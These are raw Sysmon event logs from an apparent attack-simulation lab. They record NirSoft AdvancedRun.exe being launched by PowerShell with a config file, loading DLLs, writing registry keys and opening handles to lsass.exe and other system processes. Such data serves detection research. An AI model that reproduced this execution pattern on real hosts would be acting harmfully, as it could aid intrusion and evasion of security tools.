734700x80000000000000004078553Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.846{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078552Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.843{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078551Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.842{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078550Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.842{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078549Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.841{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078548Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.841{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078547Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.840{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078546Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.840{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078545Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.838{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078544Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.837{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078543Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.836{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078542Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.836{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078541Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.836{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator
10341000x80000000000000004078540Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.825{834264DD-DAF8-61EA-5B00-000000002702}41005552C:\Windows\system32\csrss.exe{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator
10341000x80000000000000004078539Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.823{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator
154100x80000000000000004078538Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.817{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator
534500x80000000000000004078337Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:58.571{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator
734700x80000000000000004078319Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:56.022{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\edputil.dll10.0.14393.2457 (rs1_release_inmarket.180822-1743)EDP utilMicrosoft® Windows® Operating SystemMicrosoft CorporationEDPUTIL.DLLMD5=913C76FC95CE8167FAB1E55D697F3B7B,SHA256=9D82F63627DCD5F186CC60A48B412A03DFA8C6FB63426A892A110751966390A7trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078273Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:46.968{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleacc.dll7.2.14393.4169 (rs1_release.210107-1130)Active Accessibility Core ComponentMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEACC.DLLMD5=0C5492DFFA271BC1912BADFEBB497907,SHA256=536C445B9D489749547FAC1D0B01AF7F430BBFE31BCD2924E7DB3BFE66785452trueMicrosoft WindowsValidATTACKRANGE\Administrator
13241300x80000000000000004078267Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:16:44.703{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator
13241300x80000000000000004078266Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:16:44.690{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator
12241200x80000000000000004078265Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:16:44.684{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator
12241200x80000000000000004078264Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:16:44.684{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator
12241200x80000000000000004078263Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:16:44.679{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator
12241200x80000000000000004078262Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:16:44.679{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator
13241300x80000000000000004078261Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:16:44.676{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator
734700x80000000000000004078260Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:44.675{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=A612555310B7F2A688FA57C7C10615BC,SHA256=028B8BA6A6CF74776C8E4F7485BB7973DE25242F292F837D78AB9CFCC3E8AC90trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078257Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:44.672{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\samlib.dll10.0.14393.4530 (rs1_release.210705-0736)SAM Library DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSAMLib.DLLMD5=1029851F233A4FFD537D7B924F6078E9,SHA256=48FAA459585093FD2423A991B264219E5D7E0D37328D5CE6BDA917AB02607E31trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078256Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:44.671{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\samcli.dll10.0.14393.0 (rs1_release.160715-1616)Security Accounts Manager Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSAMCLI.DLLMD5=F67DFB27AACE637BEA56D3EB0726B943,SHA256=3663C2F3579BEBAF433AF101902ADA3FF87A3A6005F0AF77D1894458286E3656trueMicrosoft WindowsValidATTACKRANGE\Administrator
10341000x80000000000000004078255Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:44.670{834264DD-DAE4-61EA-0C00-000000002702}652104C:\Windows\system32\lsass.exe{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator
10341000x80000000000000004078254Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:44.670{834264DD-DAE4-61EA-0C00-000000002702}652104C:\Windows\system32\lsass.exe{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator
734700x80000000000000004078253Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:44.670{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=12ED40D048D0F5F44D3877936A1B7E8B,SHA256=8E652B0663D0F0C6BFE7102329C9A84FB1E937273E51F8FF0FC3469350AF5C41trueMicrosoft WindowsValidATTACKRANGE\Administrator
13241300x80000000000000004078252Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:16:44.666{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator
12241200x80000000000000004078251Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:16:44.666{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFoldersATTACKRANGE\Administrator
12241200x80000000000000004078250Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:16:44.666{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpaceATTACKRANGE\Administrator
734700x80000000000000004078249Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:44.665{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\actxprxy.dll10.0.14393.3808 (rs1_release.200707-2105)ActiveX Interface Marshaling LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationActXPrxy.dllMD5=CA7A58C10B61327C283100DD9277811A,SHA256=13D357E647DB3DFDFE35C56E4CC78244B35647CCA53D34F94F318DA7C848E09FtrueMicrosoft WindowsValidATTACKRANGE\Administrator
10341000x80000000000000004078248Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:44.662{834264DD-DAE6-61EA-0D00-000000002702}8762300C:\Windows\system32\svchost.exe{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator
734700x80000000000000004078247Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:44.659{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=21062367FEB4D61857A65449EA516260,SHA256=FA481B495A9FE2E3E78173C9B065E4292911A1CD403D90A03058A54309366D17trueMicrosoft WindowsValidATTACKRANGE\Administrator
10341000x80000000000000004078222Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:38.224{834264DD-DB11-61EA-9500-000000002702}4283620C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004078221Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 